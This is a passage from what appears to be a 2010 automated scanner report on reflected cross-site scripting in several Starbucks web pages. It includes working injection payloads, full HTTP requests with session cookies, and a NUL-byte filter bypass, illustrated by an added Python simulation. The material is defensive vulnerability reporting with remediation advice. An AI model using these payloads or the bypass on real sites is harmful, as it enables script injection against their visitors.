The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:19:06 GMT
Connection: close
Content-Length: 48718
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/>
...[SNIP]...
3.34. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is defended by a web application firewall (WAF) written in native code, where strings are NULL-terminated: the filter stops reading at the NULL byte, while the application receives the full input that follows it. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:19 GMT
Connection: close
Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/>
...[SNIP]...
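The NULL byte bypass described in finding 3.34, as an added example that is not part of this report and does not reproduce any real WAF's code: a filter written in native code that hands the decoded parameter to a C-string routine stops reading at the first 0x00 byte, so a signature such as expression( placed after a %00 is never compared, while the length-aware managed runtime behind it receives the whole string. The script below (Python, hypothetical filter functions, with a constructed blocked-token list and a constructed placement of %00 immediately after the five-character canary prefix, since the report only says "anywhere before the blocked characters") uses ctypes to read the buffer exactly as a NUL-terminated C string would, and places the broken filter beside a length-aware one.

```python
import ctypes
from urllib.parse import unquote_to_bytes

# Constructed signature list for a simple blocklist-style filter.
BLOCKED_TOKENS = (b"expression(", b"<script", b"javascript:")

# Parameter names as they travel in the query string (constructed, modelled on the
# finding 3.34 payload). The NUL sits right after the 5-character canary prefix.
PLAIN_PAYLOAD = 'd1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61'
NUL_PAYLOAD = 'd1e9e%00"style%3d"x%3aexpression(alert(1))"6d79117ac61'


def decode_param(encoded: str) -> bytes:
    """Percent-decode the way the web server does; %00 becomes a real 0x00 byte."""
    return unquote_to_bytes(encoded)


def native_filter_view(raw: bytes) -> bytes:
    """What a C-string based filter sees. c_char_p reads the buffer with strlen
    semantics, so the first 0x00 ends the string and the rest is invisible."""
    return ctypes.c_char_p(raw).value or b""


def native_waf_blocks(raw: bytes) -> bool:
    """Broken filter: matches signatures only against the NUL-terminated view."""
    view = native_filter_view(raw).lower()
    return any(token in view for token in BLOCKED_TOKENS)


def length_aware_waf_blocks(raw: bytes) -> bool:
    """Corrected filter: inspects the full length-prefixed buffer, NUL included."""
    return any(token in raw.lower() for token in BLOCKED_TOKENS)


def application_view(raw: bytes) -> str:
    """A managed runtime keeps the whole buffer, so the payload after the NUL
    still reaches the page (and, here, the og:url attribute)."""
    return raw.decode("utf-8")


if __name__ == "__main__":
    for label, encoded in (("plain", PLAIN_PAYLOAD), ("with %00", NUL_PAYLOAD)):
        raw = decode_param(encoded)
        print(label, "native filter sees:", native_filter_view(raw))
        print(label, "native filter blocks:", native_waf_blocks(raw),
              "| length-aware blocks:", length_aware_waf_blocks(raw))
        print(label, "application receives:", application_view(raw))
```

The native filter passes the %00 variant because its view of the input is just d1e9e, while the application still receives expression(alert(1)). The fix that does not depend on the WAF is the one in the "Issue remediation" section: encode the value at the output point in the application itself, and treat the WAF signature as defence in depth only.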
3.35. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/nutrition/20-under-200
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:11 GMT
Content-Length: 38226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/>
...[SNIP]...
3.36. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /menu/nutrition/35-under-350
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:40 GMT
Connection: close
Content-Length: 40761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/>
...[SNIP]...
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:24:22 GMT Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/> ...[SNIP]...
3.38. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:39 GMT Content-Length: 33815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/> ...[SNIP]...
3.39. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /whats-new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:19 GMT Connection: close Content-Length: 44105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/> ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:38 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GuestAssist/poweredbycooking.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14241 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:42 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... weredbycooking.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/poweredbycooking.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /StarbucksCard/default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19859 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:44 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8" var s_prop4="" var s_prop5="" var s_prop6="/starbuckscard/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Tours/ HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16822 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:29:58 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta NAME=" ...[SNIP]... e="Starbucks Tours Page" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Tours Page" var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF" var s_prop4="" var s_prop5="" var s_prop6="/starbucks-coffee-tours/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaig ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29740 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:50 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coffee HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 29705 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:52 GMT Connection: close
<!--S1--><!--S0--> <html> <head> <title>Coffee at Starbucks Store</title> <meta name="description" content="Shop for Coffee at Starbucks Store"> <meta name="keywords" content="Coffee, Sta ...[SNIP]... s_pageName="Coffee HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Coffee HomePage" var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755" var s_prop4="" var s_prop5="" var s_prop6="/coffee/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_sta ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
